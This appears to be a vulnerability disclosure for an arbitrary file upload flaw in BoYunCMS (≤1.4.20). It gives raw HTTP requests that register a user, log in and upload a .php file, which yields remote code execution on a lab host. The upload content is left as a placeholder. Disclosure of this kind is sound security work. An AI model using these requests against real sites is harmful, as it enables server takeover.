Logo BoYunCMS in file application/user/controller/Index.php has an Arbitrary File Upload vuln

BoYunCMS in file application/user/controller/Index.php has an Arbitrary File Upload vuln

BUG_Author:

YELEIPENG

 

Affected version:

≤1.4.20

 

Vendor:

https://www.boyunweb.cn/

 

Software:

https://www.boyunweb.cn/pc/index57/index/classid/26/id/42.html

 

Vulnerability File:

  • /application/user/controller/Index.php

 

Description:

1.Take a look at function add in application/user/controller/Index.php.

Decode it.

Article Image

And check here.

Article Image

We may upload any file in there.

2. Just reg a user.

POST /user/Index/reg HTTP/1.1
Host: byphpcms2.lab.wetolink.com
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=r8q479jba5ona5n0jud7a459n6
Content-Length: 27

username=test&password=test
Article Image

2. And login with captcha.

Article Image
POST /user/Index/login HTTP/1.1
Host: byphpcms2.lab.wetolink.com
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=r8q479jba5ona5n0jud7a459n6
Content-Length: 40

username=test&password=test&captcha=tutt
Article Image

3. Then upload a file.

POST /user/Index/upload HTTP/1.1
Host: byphpcms2.lab.wetolink.com
Cookie: PHPSESSID=r8q479jba5ona5n0jud7a459n6
Content-Length: 231
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW

------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="image"; filename="/D:/Users/glzjin/Downloads/Untitled-33.php"
Content-Type: <Content-Type header here>

(data)
------WebKitFormBoundary7MA4YWxkTrZu0gW--
Article Image

4. Now we may access this .php file.

Article Image

RCEed.